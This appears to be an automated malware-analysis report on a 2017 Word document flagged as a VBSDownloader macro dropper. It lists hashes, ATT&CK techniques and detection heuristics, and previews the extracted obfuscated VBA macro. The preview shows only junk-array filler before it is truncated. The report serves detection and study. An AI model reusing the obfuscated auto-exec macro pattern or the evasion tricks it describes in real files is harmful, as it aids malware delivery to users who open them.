VBSDownloader — Office (OLE) malware analysis

Static analysis result for SHA-256 cdb19d274280f7a8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 79.0 KB
Created: 2017-08-25 14:29:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: c2bf3f8260b460ac72d97fa744e5a04c
SHA-1: f7af8abbf82a4eca7f08ceaa539deccec2267555
SHA-256: cdb19d274280f7a8443063d1a8afb4df168e594268e1c4f74a15e42731dca39b
Risk Score: 282

Malware Insights

VBSDownloader · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 User Execution: Malicious File

The file contains a heavily obfuscated VBA macro with an AutoOpen function, a shape indicative of a downloader. Heuristics indicate the use of CreateObject and execution functions, and a ClamAV signature matches 'VBSDownloader'. The macro likely decodes and executes a second-stage payload, as suggested by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristic firings.

Heuristics (8)

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13683 bytes
SHA-256: 61c6942e0233992b5aec8d52f7d07920cac059ce44d390dec52ce4545dce3f39

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function ggHZrAH()
NhdxTABby = 2504
Dim ZDLwfyR(2504)
hxHuprCsK = "LnSWUXfnAMP"
 XmaHvZwXr = "pNzRNTWYeGs"
 rbrbKWmSa = "pumnrDGhgy"
 ZDLwfyR(1768) = NZpgevPN
 ZDLwfyR(647) = gKAHgKEumF
 ZDLwfyR(1248) = pLzEAgkTS
 ZDLwfyR(545) = vTfXxvmWY
 ZDLwfyR(1048) = 3692 + 3241 + 1686 / 9251 / 2387 - 2342 + 3104 + 676
 ZDLwfyR(82) = 843 + 4439 / 2904 - 7792 + 9517
 ZDLwfyR(470) = RgFRXKKkM
 ZDLwfyR(801) = UyPkGpsW
 ZDLwfyR(251) = dDLdDcmRDwL
 ZDLwfyR(710) = VETyCnrZZLh
 ZDLwfyR(749) = 6834
 ZDLwfyR(2106) = tKSXfsUMaC
 ZDLwfyR(77) = rRVyxKy
 ZDLwfyR(484) = 7936 + 4160 + 2297 + 4082 / 5720 - 7651 + 8983 + 1411
  For NhdxTABby = 731 To 236
ZDLwfyR(NhdxTABby) = NhdxTABby
Next
WttRfXgd = ZDLwfyR(781) + ZDLwfyR(898) + ZDLwfyR(2504)
 YvmCYKmM = ZDLwfyR(593) + ZDLwfyR(1000) + ZDLwfyR(1127) + ZDLwfyR(244) + ZDLwfyR(2504)
 HzvavnHwz = ZDLwfyR(2423) + ZDLwfyR(1082) + ZDLwfyR(1896) + ZDLwfyR(2326) + ZDLwfyR(1817) + ZDLwfyR(2504)
End Function
Function GwUFEFtF()
grCEmTaHyK = 6822
Dim aVXBwuWV(6822)
KeUfKeuy = "RZxMVknayT"
 NxAyHxu = "hGcaPYUXATG"
 syKuctb = "hKfnarZMes"
 aVXBwuWV(3215) = xLrDLAwXrH
 aVXBwuWV(1499) = 2372 + 7313 + 4576 + 9351 / 7044 / 3129 / 8696 - 3654 - 6812 - 8540 + 1066 + 371 + 323
 aVXBwuWV(5600) = 4057 + 615 + 5887 / 2310 / 4003 / 1580 - 4280 - 6075 + 4845 + 6998
 aVXBwuWV(2646) = 8313 + 577 + 4827 + 4148 / 1006 / 3709 / 1061 - 1943 - 2186 + 2847 + 8005 + 8561
 aVXBwuWV(1282) = zUHgvrMNPf
 aVXBwuWV(96) = 1970
 aVXBwuWV(2497) = 8889
 aVXBwuWV(6214) = 9092
 aVXBwuWV(2755) = McZPMNWcvN
 aVXBwuWV(5785) = syySAEW
 aVXBwuWV(4744) = TTtuFewLbn
 aVXBwuWV(407) = 4924 + 5224 + 756 / 5747 / 2024 / 5448 - 9548 - 3032 + 8581
 aVXBwuWV(6011) = 1767 + 1854 / 5715 / 2502 / 2899 - 4313 - 3213 + 2786 + 1922 + 5644
 aVXBwuWV(3320) = 5873 + 9559 + 4487 + 6311 / 848 - 5245 - 731 - 1251 + 6461 + 5836 + 6242
  For grCEmTaHyK = 3857 To 285
aVXBwuWV(grCEmTaHyK) = grCEmTaHyK
Next
neeKMfyaE = aVXBwuWV(6719) + aVXBwuWV(1194) + aVXBwuWV(2664) + aVXBwuWV(270) + aVXBwuWV(6822)
 ewhVpGTb = aVXBwuWV(6339) + aVXBwuWV(222) + aVXBwuWV(5894) + aVXBwuWV(4975) + aVXBwuWV(4036) + aVXBwuWV(2582) + aVXBwuWV(6822)
End Function
Function vhNHRsRdK()
aSgdhSz = 787
Dim CSbPSUrL(787)
xkgGMebRK = "CkKLBkBZbbV"
 dcMFfDT = "PVNVnaRFMsw"
 CSbPSUrL(412) = ztHcWyFA
 CSbPSUrL(769) = gvgvZKsS
 CSbPSUrL(541) = EFSfeSE
 CSbPSUrL(339) = 3421 + 5699 + 1672 + 9169 / 1024 - 5720 + 1199 + 4759
 CSbPSUrL(693) = fXfyaMyr
 CSbPSUrL(568) = DxsNGMc
 CSbPSUrL(113) = 8323
 CSbPSUrL(183) = 6140
 CSbPSUrL(672) = 3152
 CSbPSUrL(324) = sMgKwyyD
 CSbPSUrL(77) = psgcdmxgz
 CSbPSUrL(516) = UCRFgFTnpL
 CSbPSUrL(361) = 4357 + 642 / 5608 / 9553 - 1432 - 377 - 2131 + 6262 + 6395
 CSbPSUrL(692) = 5879 + 4923 + 5377 + 9103 / 4117 / 1333 - 5129 + 4755 + 8012
 CSbPSUrL(142) = 2063 + 2590 + 3049 / 5264 / 7937 / 7701 - 5420 + 5570 + 468 + 1642
  For aSgdhSz = 711 To 93
CSbPSUrL(aSgdhSz) = aSgdhSz
Next
RKDHadwff = CSbPSUrL(82) + CSbPSUrL(260) + CSbPSUrL(93) + CSbPSUrL(534) + CSbPSUrL(55) + CSbPSUrL(787)
 cxYUmfZ = CSbPSUrL(507) + CSbPSUrL(481) + CSbPSUrL(545) + CSbPSUrL(82) + CSbPSUrL(66) + CSbPSUrL(787)
End Function
Function MRDWNun()
GFrdeFg = 1671
Dim GVHnCaM(1671)
sdGbMkWV = "LTNekbMyHz"
 ZBxdgHNxz = "VzkGTcxWZN"
 bYhRNTHNE = "znCdABEVc"
 GVHnCaM(375) = zNeXbnn
 GVHnCaM(959) = 9318 + 2153 + 8734 / 4786 - 3913 + 7206 + 3357 + 9319
 GVHnCaM(795) = DwwRNXnN
 GVHnCaM(948) = 6632
 GVHnCaM(1589) = GrsdTtRRyB
 GVHnCaM(1608) = DmnCWcmE
 GVHnCaM(1292) = HRdUfgcrwt
 GVHnCaM(1466) = BUkHcNbVgkM
 GVHnCaM(965) = 8876 + 8151 + 2573 + 7598 / 1250 - 9171 - 743 + 1297 + 397 + 4767
  For GFrdeFg = 1255 To 1455
GVHnCaM(GFrdeFg) = GFrdeFg
Next
hYXkSbwsRM = GVHnCaM(293) + GVHnCaM(1234) + GVHnCaM(1033) + GVHnCaM(260) +
... (truncated)